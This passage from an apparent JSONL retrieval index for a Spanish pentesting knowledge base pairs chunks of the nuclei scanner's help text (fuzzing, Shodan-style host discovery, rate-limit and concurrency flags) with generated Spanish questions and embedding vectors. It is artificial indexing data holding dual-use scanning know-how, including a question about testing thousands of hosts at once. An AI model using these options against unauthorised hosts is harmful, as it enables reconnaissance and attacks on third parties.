0.09164, -0.03094, 0.04891, 0.05713, -0.11333, 0.18987, 0.00811, 0.08764, 0.0443, 0.00962, -0.09091, -0.07068, 0.02188, -0.09118, 0.10996, 0.05915, -0.02354, -0.04235, -0.02622, -0.02679, -0.10481, -0.07326, 0.00315, -0.05398, 0.0364, 0.004, -0.06174, 0.04929, -0.08308, -0.08287, -0.02979, -0.06848, 0.03102, 0.04876, 0.05003, 0.01827, 0.06684, -0.03974, 0.04638, 0.0363, -0.04092, -0.06726, 0.06118, -0.04855, -0.02878, 0.05362, -0.05223, -0.00834, -0.00545, 0.04756, 0.07751, 0.00146, 0.04614, 0.03012, 0.04805, 0.02896, 0.00187, -0.02674, 0.06299, 0.00836, -0.04292, -0.08483, 0.04747, -0.12016, -0.0524, -0.04416, -0.0625, -0.04304, 0.05299, -0.05432, 0.05237, -0.0586, 0.00679, 0.02888, -0.03039, 0.03774, 0.0361, 0.1417, 0.10744, -0.00758, 0.13214, 0.06744, -0.09027, 0.02967, -0.01497, 0.01284, -0.04799, 0.01777, -0.07866, -0.0791, -0.03982, 0.06747, 0.03573, -0.00527, -0.03365, -0.01918, 0.03879, 0.03496, 0.0367, -0.04279, 0.00822, -0.03047, 0.02844, 0.05635, 0.00515, -0.00576, -0.03381, -0.02237, -0.05594, -0.08284, -0.03751, -0.05166, -0.0165, 0.05168, 0.11395, 0.02083, -0.00659, 0.01487, 0.10328, -0.01645, 0.01265, 0.07498, 0.02273, -0.0293, -0.09628, 0.04993, 0.09118, 0.00148, 0.03096, -0.04406, -0.0571, -0.01737, 0.06384, 0.02279, -0.01636, 0.00466, -0.03459, 0.00342, -0.00563, 0.03259, -0.06728, -0.04975, -0.04355, 0.02014, -0.02704, 0.00227, 0.0067, -0.03822, -0.07632, -0.06061, 0.0533, 0.01368, -0.05306, -0.01491, -0.04734, -0.0329, -0.01026, -0.01046, -0.01106, -0.06737, 0.05587, 0.05142, -0.04168, 0.01477, 0.00963]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FUZZING:\n -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)\n -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)\n -fuzz enable loading fuzzing templates (Deprecated: use -dast instead)\n -dast enable / run dast (fuzz) nuclei templates\n -dts, -dast-server enable dast server mode (live fuzzing)\n -dtr, -dast-report write dast scan report to file\n -dtst, -dast-server-token string dast server token (optional)\n -dtsa, -dast-server-address string dast server address (default \"localhost:9055\")\n -dfp, -display-fuzz-points display fuzz points in the output for debugging\n -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)\n -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default \"low\")\n -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer\n -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer", "indexar": "con que puedo hacer un fuzzing de una URL", "v": [-0.02281, 0.01536, -0.21084, 0.09129, -0.01674, 0.12177, -0.13199, 0.02007, 0.06014, -0.09561, -0.12996, -0.05682, -0.04634, 0.07692, -0.16916, -0.1216, -0.06894, 0.06977, -0.04857, 0.02626, 0.1053, -0.05074, -0.1481, -0.0779, -0.12995, -0.00406, 0.10449, -0.02417, -0.10531, -0.13106, 0.05934, 0.05202, -0.07567, 0.06554, -0.04764, 0.05615, 0.12542, 0.1404, 0.01802, -0.00217, -0.0631, 0.10944, -0.17572, 0.03442, -0.0324, 0.02302, -0.07053, -0.1776, 0.0799, 0.04438, 0.09045, -0.07746, -0.05785, -0.01497, -0.07046, -0.01551, -0.0668, -0.19234, 0.01711, 0.03271, 0.03403, -0.09696, 0.00221, 0.11016, -0.09735, 0.04215, -0.02482, 0.01123, -0.01216, 0.05261, 0.07209, -0.06612, -0.04482, -0.18672, -0.00076, 0.07725, 0.00315, -0.05131, -0.03901, -0.00115, 0.03422, 0.03767, -0.03019, 0.03104, 0.01033, 0.0017, -0.05784, -0.11316, 0.04179, -0.07116, -0.03513, 0.1219, -0.06066, -0.02936, -0.0111, 0.00295, -0.00164, -0.02306, -0.01687, -0.02076, -0.00325, 0.0119, -0.1151, 0.05897, 0.06092, -0.05488, 0.10724, 0.00326, 0.0064, 0.0212, -0.02684, 0.07913, -0.05533, -0.12986, -0.04543, -0.03975, -0.08948, -0.03482, -0.01698, -0.04137, 0.01179, -0.14846, -0.02479, -0.01553, -0.03651, 0.06165, 0.02096, 0.01614, 0.01498, -0.01108, 0.06549, 0.06299, -0.01924, -0.02512, 0.12667, 0.00937, 0.10931, -0.04032, -0.01171, 0.01233, -0.00464, 0.01915, -0.00087, 0.05015, 0.03828, -0.12178, -0.09165, -0.00404, -0.04997, 0.00051, -0.03226, 0.05183, 0.03404, -0.02392, -0.06576, -0.03138, 0.07957, 0.00058, 0.02379, 0.00667, 0.03766, 0.09471, -0.0477, 0.00269, 0.03962, 0.03602, -0.06869, 0.03604, -0.03203, -0.03651, -0.03119, 0.04899, -0.01365, -0.05272, 0.08351, -0.00655, -0.08909, -0.0167, 0.04798, -0.03054, 0.03458, -0.04582, -0.04579, 0.00268, 0.05935, -0.07741, 0.05319, -0.01839, -0.04067, 0.05294, 0.01855, -0.02417, -0.00739, 0.09769, -0.00837, 0.03946, 0.03899, 0.00415, -0.07876, -0.02144, -0.03999, -0.05368, -0.00294, -0.04259, -0.05322, 0.00938, -0.03681, -0.0296, -0.03436, -0.03489, 0.04881, 0.00635, 0.05405, -0.04334, -0.04469, 0.05565, -0.0183, -0.02114, -0.00795, -0.03624, 0.05902, 0.05834, 0.03528, -0.00233, -0.03024, -0.02584, 0.00332, -0.00948, -0.01711, 0.0264, -0.00817, -0.02643, 0.01338, 0.0001, 0.01461, -0.00163, -0.03241, 0.00298, -0.05527, 0.02992, -0.0425, 0.00631, 0.01258, 0.04549, 0.06114, -0.03338, -0.08553, -0.03386, -0.03582, -0.06004, -0.01474, 0.00319, 0.03862, 0.03205, 0.01924, 0.02786]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FUZZING:\n -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)\n -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)\n -fuzz enable loading fuzzing templates (Deprecated: use -dast instead)\n -dast enable / run dast (fuzz) nuclei templates\n -dts, -dast-server enable dast server mode (live fuzzing)\n -dtr, -dast-report write dast scan report to file\n -dtst, -dast-server-token string dast server token (optional)\n -dtsa, -dast-server-address string dast server address (default \"localhost:9055\")\n -dfp, -display-fuzz-points display fuzz points in the output for debugging\n -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)\n -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default \"low\")\n -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer\n -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer", "indexar": "hay alguna herramienta gratuita que detecte fallos comunes en sitios web", "v": [0.07347, 0.09087, -0.19197, -0.12513, -0.00037, -0.12156, -0.02711, -0.04447, -0.09913, -0.06637, -0.12449, -0.00652, -0.10278, 0.0018, 0.17645, 0.01914, 0.13774, -0.09323, -0.01717, -0.1025, -0.08341, -0.0703, -0.09591, 0.01575, -0.14121, -0.08067, 0.00693, -0.09496, -0.12763, 0.02736, 0.12676, -0.00585, 0.01215, -0.00079, -0.09059, -0.07075, -0.03175, -0.0398, -0.01054, -0.02422, 0.03881, 0.01235, -0.11683, -0.01777, -0.098, -0.07916, -0.15208, -0.06458, 0.06613, 0.01636, -0.03425, -0.13684, -0.10162, -0.01901, -0.01863, -0.11997, 0.20445, -0.00844, 0.03017, -0.11378, -0.12706, 0.05117, -0.03344, -0.03757, -0.04817, -0.06066, 0.0442, 0.0162, -0.0485, -0.0129, 0.04611, 0.03702, 0.08361, 0.0384, 0.08413, -0.068, 0.03661, 0.00724, 0.10627, -0.02492, 0.03811, -0.0278, -0.00442, 0.00313, -0.13486, -0.06143, -0.01456, -0.10264, -0.01355, -0.10693, 0.02788, 0.09319, 0.00658, 0.01434, -0.00817, -0.08819, 0.16778, -0.03408, 0.03822, 0.02654, 0.12229, -0.05044, -0.07324, 0.06411, 5e-05, 0.0751, -0.02787, 0.03109, -0.02866, -0.01854, 0.07638, -0.0634, 0.01539, -0.02051, -0.0737, 0.07168, 0.05682, -0.03602, -0.00826, -0.03742, -0.05266, -0.02515, -0.07432, -0.04344, -0.07641, -0.01955, -0.01651, 0.05901, -0.00077, -0.05836, 0.02435, -0.02622, -0.10593, -0.00551, -0.04512, 0.06076, 0.07672, -0.04094, -0.02922, -0.03375, 0.02233, -0.03516, -0.05874, -0.01925, 0.01894, -0.02552, 0.01176, -0.03396, -0.13702, -0.03285, -0.06189, 0.02851, -0.01914, 0.01164, -0.00486, 0.04993, -0.03076, -0.01901, -0.04074, 0.02998, -0.05085, -0.0406, 0.05392, 0.0216, 0.00719, -0.00094, -0.0177, 0.05344, 0.03779, 0.06091, -0.00498, 0.08261, -0.02937, -0.11314, -0.07312, -0.02206, -0.08965, -0.05168, 0.0572, -0.12749, -0.00398, 0.01018, -0.05524, -0.01171, -0.02872, -0.02851, 0.02071, -0.01844, 0.01528, 0.03003, 0.03175, -0.01091, -0.05121, 0.01076, 0.07071, 0.03209, -0.02172, -0.08097, 0.04051, 0.01665, -0.08583, -0.04688, -0.02253, -0.04543, -0.05191, 0.05093, -0.00462, -0.03391, 0.00836, 0.03401, -0.00235, -0.01948, 0.02146, -0.13249, -0.02465, -0.04626, 0.07195, 0.0046, -0.07954, 0.00867, 0.06605, -0.01392, 0.03644, 0.00508, 0.0121, 0.0153, 0.05324, 0.03182, 0.04699, 0.06174, 0.04889, -0.02887, -0.05548, -0.07213, 0.03719, -0.03191, 0.02716, -0.01701, -0.08001, -0.01852, 0.00129, 0.03826, 0.05069, -0.02396, 0.02608, -0.09632, -0.02937, -0.05871, 0.00538, -0.0471, -0.03352, 0.01438, 0.03431, -0.05928, 0.0173, -0.01902]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UNCOVER:\n -uc, -uncover enable uncover engine\n -uq, -uncover-query string[] uncover search query\n -ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google,odin,binaryedge) (default shodan)\n -uf, -uncover-field string uncover fields to return (ip,port,host) (default \"ip:port\")\n -ul, -uncover-limit int uncover results to return (default 100)\n -ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)", "indexar": "que herramienta sirve para hacer bΓΊsqueda inversa de IPs con mΓΊltiples fuentes?", "v": [0.07589, 0.03242, -0.18189, -0.15231, 0.03212, -0.18257, -0.07596, -0.1122, -0.05933, -0.08957, 0.11925, -0.04562, 0.06929, -0.08764, 0.00672, 0.09368, 0.04166, -0.14924, 0.02046, -0.11555, -0.04572, 0.05912, -0.14846, -0.10039, -0.22261, 0.06781, -0.11328, 0.05124, -0.10289, -0.04764, -0.17153, -0.02076, -0.03489, -0.00581, -0.22409, -0.13252, -0.0372, 0.12379, -0.02407, -0.03604, 0.00927, 0.09554, -0.12471, 0.04107, -0.02877, 0.02114, 0.00576, -0.01833, 0.01997, 0.03541, -0.15219, -0.21703, -0.0901, -0.05082, -0.08351, -0.09781, 0.09382, -0.1505, -0.09026, -0.1071, -0.10015, 0.0193, -0.16036, -0.07115, 0.04145, -0.03878, -0.03434, -0.02303, -0.01175, -0.05218, -0.02369, -0.00274, 0.00119, -0.00856, 0.01169, -0.03345, 0.08152, 0.02928, 0.04352, 0.06206, -0.03496, -0.01541, -0.15248, -0.05795, -0.01637, -0.09879, 0.09874, -0.06771, 0.0709, -0.08796, -0.04932, 0.07792, -0.03766, 0.00511, -0.00711, -0.01441, 0.02873, -0.00931, -0.05171, -0.00157, 0.08175, -0.03853, -0.055, 0.03614, -0.00558, 0.02691, 0.01702, -0.01989, -0.03385, 0.03626, -0.00646, 0.02802, 0.06435, 0.02162, 0.03872, 0.05573, 0.00478, -0.02838, 0.00834, -0.00463, 0.05989, 0.03017, -0.07206, 0.01466, 0.03156, 0.00779, -0.00239, 0.01581, 0.08052, -0.03762, 0.0418, -0.03232, -0.01224, 0.00584, 0.02147, -0.05788, 0.06112, -0.10174, -0.01165, -0.01857, 0.0648, 0.01184, 0.00255, -0.10047, 0.07433, -0.06805, 0.10132, -0.06693, -0.02981, -0.04867, -0.01286, -0.01853, -0.01326, 0.01282, -0.09239, 0.0279, -0.09672, -0.02849, -0.11653, 0.02872, -0.04048, -0.00992, 0.05643, 0.00202, 0.02881, -0.0046, -0.01532, 8e-05, 0.05145, 0.0179, -0.02391, 0.01249, 0.01983, -0.03345, -0.04016, -0.00636, -0.00061, 0.00995, -0.00033, -0.03822, -0.03123, -0.04054, -0.05121, -0.03693, 0.06065, -0.02924, 0.08487, -0.01706, 0.01266, -0.02308, -0.00308, -0.00908, -0.02052, -0.00518, 0.05786, 0.01516, 0.00146, -0.03872, 0.03188, -0.06653, -0.00467, 0.01488, -0.00653, -0.00406, 0.03755, 0.05793, -0.06089, -0.01067, 0.00569, -0.02867, 0.0007, 0.00893, 0.04182, 0.01435, -0.06601, -0.0337, -0.03745, -0.00991, -0.00914, 0.00662, -0.01481, -0.03235, -0.06245, 0.00775, -0.00769, -0.0337, 0.01382, -0.04491, -0.02025, -0.01524, 0.03703, 0.02384, -0.02744, -0.01924, 0.00752, -0.06616, -0.01005, 0.00175, 0.04547, -0.02107, -0.01202, -0.02525, 0.00805, -0.01625, -0.00506, -0.0097, -0.01901, -0.00992, -0.00011, -0.04515, -0.04458, 0.01656, 0.00728, 0.01828, 0.01709, -0.05707]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UNCOVER:\n -uc, -uncover enable uncover engine\n -uq, -uncover-query string[] uncover search query\n -ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google,odin,binaryedge) (default shodan)\n -uf, -uncover-field string uncover fields to return (ip,port,host) (default \"ip:port\")\n -ul, -uncover-limit int uncover results to return (default 100)\n -ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)", "indexar": "cual es una alternativa a shodan que permita elegir varios motores de bΓΊsqueda como censys o fofa?", "v": [0.08096, -0.04246, -0.12043, 0.07389, -0.12893, -0.0446, 0.02408, -0.18478, -0.20332, -0.21251, -0.16241, -0.01888, -0.00964, -0.07151, 0.08426, 0.00081, 0.07093, -0.08973, 0.00082, 0.03403, -0.05755, -0.15626, -0.09204, -0.04594, -0.02162, 0.04939, -0.00344, -0.03236, -0.09526, 0.06919, 0.08329, -0.00143, 0.15504, 0.03929, -0.05985, -0.02277, 0.05972, 0.04801, 0.09272, -0.04671, -0.0461, -0.03196, -0.20961, -0.02167, -0.04612, -0.10776, -0.12264, 0.03074, -0.08096, -0.03383, -0.01792, 0.03881, 0.00714, 0.02572, 0.10634, -0.06142, 0.11197, -0.08503, -0.0266, -0.10247, -0.08655, 0.0272, -0.02523, 0.03531, -0.01756, -0.00029, -0.00611, -0.06001, -0.05427, -0.0867, -0.0336, -0.02438, 0.05479, -0.03579, -0.02224, 0.08141, 0.01445, -0.02509, 0.04842, 0.0381, 0.03681, -0.08787, -0.11338, 0.08142, -0.01591, -0.00703, 0.06596, -0.04081, -0.01359, -0.03315, 0.00588, 0.06108, 7e-05, 0.12207, -0.0072, 0.06946, 0.05599, 0.10139, -0.03187, 0.06233, 0.0591, -0.05687, -0.04984, 0.07654, 0.01383, 0.01521, 0.06, 0.04986, -0.05437, 0.02983, 0.0399, 0.06723, -0.01087, -0.09635, -0.04061, -0.0768, -0.06947, 0.01389, 0.02122, -0.07554, -0.10577, -0.00826, 0.00308, -0.04324, 0.03939, 0.10486, 0.00452, -0.01688, -0.03694, 0.02271, 0.091, 0.00528, -0.0031, -0.08139, -0.07317, -0.01671, 0.00104, -0.02195, 0.12907, -0.05823, 0.11662, 0.06789, 0.05669, -0.1273, 0.11989, -0.0246, -0.07938, 0.00267, -0.05464, -0.1059, -0.1109, -0.0696, 0.07345, 0.10132, -0.03446, 0.02322, -0.03559, -0.0244, 0.0168, 0.04201, 0.03309, -0.03956, 0.02933, -0.01449, 0.04278, 0.02662, -0.05615, -0.10849, -0.06816, -0.0192, -0.03197, 0.00723, -0.01723, -0.01892, 0.08666, 0.06883, -0.00454, -0.0666, 0.02881, 0.04631, -0.02866, 0.01783, -0.09567, 0.06709, 0.00362, -0.04439, 0.04306, 0.01399, -0.03268, -0.01256, 0.03081, 0.01045, -0.06175, -0.0041, -0.00508, 0.03121, 0.00039, -0.01422, -0.00907, -0.083, -0.08767, -0.00351, -0.09066, -0.08174, -0.0009, 0.02014, -0.05678, 0.00411, 0.01727, -0.03261, 0.05367, -0.04166, 0.03532, 0.02155, -0.07029, -0.00777, -0.00559, -0.08107, -0.00361, 0.01157, -0.01182, 0.00768, 0.04511, 0.04294, -0.02737, 0.00824, 0.04453, 0.03523, 0.03742, 0.02759, -0.00756, -0.00767, -0.03977, 0.01049, 0.03398, 0.06574, 0.02685, -0.00639, -0.02103, -0.01897, 0.10866, 0.0009, -0.02626, 0.00094, 0.00307, -0.01098, -0.03313, 0.04484, 0.02016, -0.02593, 0.00949, 0.04169, -0.02764, -0.05594, 0.07471, -0.03768]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UNCOVER:\n -uc, -uncover enable uncover engine\n -uq, -uncover-query string[] uncover search query\n -ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google,odin,binaryedge) (default shodan)\n -uf, -uncover-field string uncover fields to return (ip,port,host) (default \"ip:port\")\n -ul, -uncover-limit int uncover results to return (default 100)\n -ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)", "indexar": "como puedo ejecutar bΓΊsquedas de inteligencia contra direcciones IP con lΓ­mites controlados?", "v": [0.12981, 0.04372, -0.10863, -0.11985, 0.09572, -0.17779, -0.0195, 0.00394, -0.1214, 0.02214, 0.1247, 0.0068, 0.00233, -0.09794, 0.03558, 0.04908, 0.12033, -0.00212, -0.0385, -0.21212, -0.00868, 0.03189, -0.01922, -0.01377, -0.03381, 0.04544, -0.13561, 0.14733, -0.04992, -0.15176, -0.20406, -0.09369, 0.05986, 0.01154, -0.14003, -0.05021, -0.06798, 0.16775, 0.07456, 0.0447, -0.00617, 0.05756, -0.07858, 0.02019, 0.0506, 0.02805, -0.00999, -0.05904, 0.03784, -0.08736, -0.15582, -0.08595, -0.03999, -0.05282, -0.06217, -0.0051, 0.07745, -0.02526, -0.03175, -0.0436, -0.1415, -0.00806, 0.05652, 0.09955, 0.03843, 0.02137, -0.04955, 0.00582, -0.09325, -0.00013, -0.02215, -0.02436, -0.125, 0.0867, 0.07168, -0.00151, -0.00734, -0.00896, 0.05001, 0.01786, -0.04202, -0.0292, -0.1939, -0.0201, 0.01997, -0.10018, -0.04623, -0.19245, -0.01069, -0.05233, 0.02971, 0.01522, -0.0301, 0.02388, 0.01671, 0.06118, 0.04218, 0.02636, -0.0075, 0.08815, -0.02619, 0.02476, -0.17317, 0.13304, 0.09858, 0.14564, 0.05273, -0.00302, 0.03372, -0.06802, -0.04514, -0.00394, 0.01003, -0.06057, -0.02419, -0.01309, -0.02053, -0.03068, 0.07661, -0.03208, -0.13036, -0.02364, -0.00194, -0.00309, 0.04272, -0.01557, -0.03407, 0.0722, 0.07171, -0.04216, -0.00576, -0.06152, 0.0535, -0.0748, 0.04703, 0.09978, -0.01179, -0.03472, -0.01311, 0.02398, 0.0319, -0.05413, 0.02334, -0.06672, 0.05866, -0.06696, -0.01452, -0.03568, 0.012, -0.05054, 0.05142, -0.01753, -0.02978, 0.09603, -0.03187, 0.00332, -0.05481, -0.04422, 0.04143, 0.0358, 0.01915, 0.04796, -0.07673, 0.02759, 0.10125, 0.07189, -0.03404, 0.00051, 0.03083, 0.01152, -0.08005, 0.02092, -0.03549, -0.0416, -0.00564, -0.06657, -0.00194, 0.04836, 0.05848, -0.0309, 0.00155, -0.0068, -0.03219, -0.03486, 0.00172, -0.00264, 0.03318, -0.01696, 0.02733, 0.02607, 0.01266, 0.00436, 0.00223, 0.02782, 0.05633, -0.05237, -0.01612, 0.00913, -0.06751, -0.02726, 0.0283, 0.01924, -0.0658, 0.01152, -0.06258, 0.02608, 0.02296, 0.01062, -0.02562, 0.02512, -0.01743, -0.05839, 0.03327, -0.01943, -0.12231, 0.01799, 0.01309, -0.06062, 0.01193, 0.01486, -0.00786, 0.0336, -0.00453, 0.01358, -0.00777, -0.04144, -0.01506, -0.01429, 0.00883, -0.01744, -0.01673, -0.00433, -0.03685, -0.05288, 0.02848, -0.02949, -0.02535, -0.01666, 0.01361, -0.03412, -0.05055, 0.0508, 0.00147, -0.05878, -0.02408, -0.03644, -0.12749, -0.01944, -0.00339, -0.04856, -0.01979, 0.03603, 0.053, -0.02932, 0.03454, -0.03085]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "RATE-LIMIT:\n -rl, -rate-limit int maximum number of requests to send per second (default 150)\n -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)\n -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)\n -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)\n -c, -concurrency int maximum number of templates to be executed in parallel (default 25)\n -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)\n -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)\n -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)\n -pc, -payload-concurrency int max payload concurrency for each template (default 25)\n -prc, -probe-concurrency int http probe concurrency with httpx (default 50)", "indexar": "que herramienta sirve para enviar peticiones HTTP masivamente en paralelo?", "v": [0.10083, 0.07578, -0.18749, -0.14425, 0.01265, -0.12709, -0.05079, -0.0723, 0.06232, 0.00736, -0.06679, 0.02878, 0.0756, -0.07392, 0.10896, 0.02529, 0.07322, -0.1, 0.10517, -0.03988, 0.02927, 0.01199, -0.10409, -0.09333, -0.19731, -0.04385, 0.06362, 0.02596, -0.20526, -0.03559, 0.06874, -0.06192, -0.13601, 0.06084, -0.09624, -0.02839, -0.08192, 0.09392, -0.04495, 0.03506, 0.00522, 0.09948, -0.08964, -0.01699, -0.11379, -0.02222, -0.01563, -0.04815, 0.00519, -0.01197, -0.04632, -0.12663, -0.25914, 0.07444, -0.07998, 0.02658, 0.24176, -0.22213, 0.03303, -0.17545, -0.05441, -0.09399, 0.02385, -0.01134, 0.03567, -0.07794, -0.06207, -0.01553, -0.1073, 0.07119, -0.08275, 0.01079, 0.02876, -0.04102, 0.04145, 0.00324, -0.05394, -0.0343, -0.0609, 0.06113, 0.06439, -0.00578, -0.0411, 0.02521, -0.07402, -0.02808, 0.0173, -0.03855, 0.05234, -0.0146, 0.02668, 0.1562, 0.00486, 0.01361, 0.02982, -0.03439, -0.04629, -0.09531, 0.01355, 0.00187, 0.05282, -0.00277, -0.02553, -0.0436, 0.03103, 0.04406, 0.02289, -0.04562, 0.03416, 0.01514, 0.0583, 0.00389, 0.00276, 0.05675, 0.00943, 0.02548, -0.09877, -0.00137, 0.04415, -0.03899, -0.00279, 0.00281, -0.11515, -0.01751, -0.00055, -0.00971, -0.02203, 0.02893, 0.01781, -0.03777, 0.02625, -0.03774, -0.08995, 0.02916, -0.01744, 0.00677, 0.02797, -0.11738, 0.03657, -0.0147, -0.02197, 0.06788, -0.0712, -0.12765, -0.00069, 0.02392, 0.03134, -0.02903, -0.01118, -0.04905, 0.04082, -0.01367, -0.04585, -0.01502, -0.09391, -0.02317, 0.00631, -0.0542, -0.10186, 0.07991, 0.01465, 0.00138, 0.07591, 0.03977, -0.02051, 0.00272, -0.07473, 0.04055, 0.03162, 0.02631, 0.03973, 0.02788, -0.0468, -0.09167, -0.04934, -0.02548, -0.05483, -0.01174, -0.00611, -0.03269, -0.01278, -0.02591, -0.02149, 0.03723, 0.06069, -0.04587, 0.04891, -0.02273, 0.06475, 0.07783, 0.0536, 0.05647, -0.04368, -0.00395, 0.04176, 0.01451, -0.07079, -0.03185, 0.06129, 0.00094, -0.04371, -0.04529, 0.01293, -0.05763, -0.02875, 0.04297, -0.00155, -0.00728, -0.02318, -0.00867, 0.02171, -0.01641, 0.04209, 0.0026, 0.03549, -0.02474, 0.06945, 0.03178, -0.02787, -0.00483, -0.00907, -0.01201, 0.01323, -0.00032, 0.01931, 0.04293, 0.05003, -0.02197, 0.0198, -0.01693, 0.00597, -0.02629, -0.06459, -0.0231, 0.04433, -0.00476, 0.00741, 0.00036, -0.02646, -0.03259, 0.01542, 0.0084, -0.0198, 0.01005, 0.00512, -0.05492, -0.08809, -0.03387, -0.01254, -0.03447, -0.08314, -0.00628, 0.03646, -0.04196, -0.01022, -0.02063]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "RATE-LIMIT:\n -rl, -rate-limit int maximum number of requests to send per second (default 150)\n -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)\n -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)\n -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)\n -c, -concurrency int maximum number of templates to be executed in parallel (default 25)\n -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)\n -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)\n -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)\n -pc, -payload-concurrency int max payload concurrency for each template (default 25)\n -prc, -probe-concurrency int http probe concurrency with httpx (default 50)", "indexar": "con que puedo automatizar la prueba de penetraciΓ³n a miles de hosts al mismo tiempo?", "v": [0.08757, 0.12258, -0.15408, -0.07852, 0.00835, 0.11158, -0.10114, -0.01468, -0.08241, -0.00764, -0.07097, 0.01947, 0.04263, 0.12997, 0.04175, 0.05059, 0.05003, -0.03527, -0.03304, 0.07527, 0.05875, -0.05796, -0.05262, -0.04444, 0.04196, 0.06688, 0.04704, 0.06577, -0.1835, -0.09862, -0.10652, -0.02522, 0.01594, -0.01099, 0.07423, -0.15108, -0.02566, 0.17675, 0.09739, 0.11868, 0.02749, 0.0078, 0.02277, 0.0056, 0.143, 0.02832, -0.03726, -0.00927, -0.07048, -0.09502, -0.0401, -0.06165, -0.04829, -0.03622, -0.02907, -0.0726, 0.14028, -0.05355, 0.04563, -0.02959, 0.02063, -0.00737, 0.00885, 0.08171, 0.06567, -0.03631, 0.05476, 0.04405, -0.08535, 0.03382, -0.01288, 0.01606, -0.03458, -0.06008, -0.05106, 0.01707, -0.00276, 0.04998, 0.00551, -0.00181, 0.00947, -0.00281, -0.04909, -0.00094, -0.07059, -0.03496, 0.02799, -0.0965, 0.05158, -0.03217, 0.02669, 0.0524, 0.12643, 0.09099, 0.01622, -0.07311, 0.13207, -0.04668, 0.01625, 0.03182, 0.07273, 0.01045, -0.092, 0.18034, 0.02858, 0.03789, 0.08182, 0.00946, 0.07298, -0.12608, 0.03077, 0.04102, -0.14669, -0.15509, -0.03657, 0.05321, 0.01467, -0.05597, -0.07592, -0.08246, -0.07996, -0.05343, -0.03936, 0.04948, -0.01585, -0.03569, 0.03324, -0.00916, -0.00792, -0.0258, 0.07471, 0.09925, -0.05913, -0.03018, 0.02173, 0.06124, -0.04311, -0.03331, -0.04159, -0.0147, -0.00403, 0.14187, 0.01235, -0.0451, 0.0645, 0.03749, -0.10613, -0.11173, -0.09346, 0.02093, -0.10179, -0.00595, 0.02329, 0.09844, -0.0336, 0.00705, 0.10357, -0.03052, 0.07046, 0.05786, -0.00099, -0.0165, -0.06088, -0.03354, 0.06607, 0.01719, -0.03835, -0.08443, 0.01571, -0.04649, -0.08888, 0.12226, -0.04139, -0.03998, -0.00272, 0.06063, 0.00172, -0.05069, -0.00083, -0.02474, 0.01711, 0.03931, -0.10564, -0.09381, 0.03188, 0.04639, 0.03264, 0.0211, 0.05339, 0.00244, 0.01442, -0.0209, -0.01051, 0.06713, 0.03317, -0.04496, -0.01723, 0.05521, -0.02187, -0.02966, -0.07013, -0.02411, 0.02497, -0.00324, 0.00463, 0.04985, -0.00851, 0.0551, 0.00777, -0.04094, 0.01036, 0.01578, 0.07125, -0.08968, -0.0823, -0.01243, 0.03915, -0.02376, -0.05893, 0.00431, 0.02652, 0.02742, 0.04767, -0.02107, -0.05603, -0.00209, 0.09446, 0.05801, 0.08963, -0.00467, -0.05566, 0.02614, -0.04963, -0.04469, 0.10018, -0.01976, 0.01171, -0.06031, -0.00571, -0.0706, 0.00772, 0.12424, -0.00485, -0.03377, -0.05702, -0.03917, -0.05606, -0.02198, -0.00668, -0.06101, 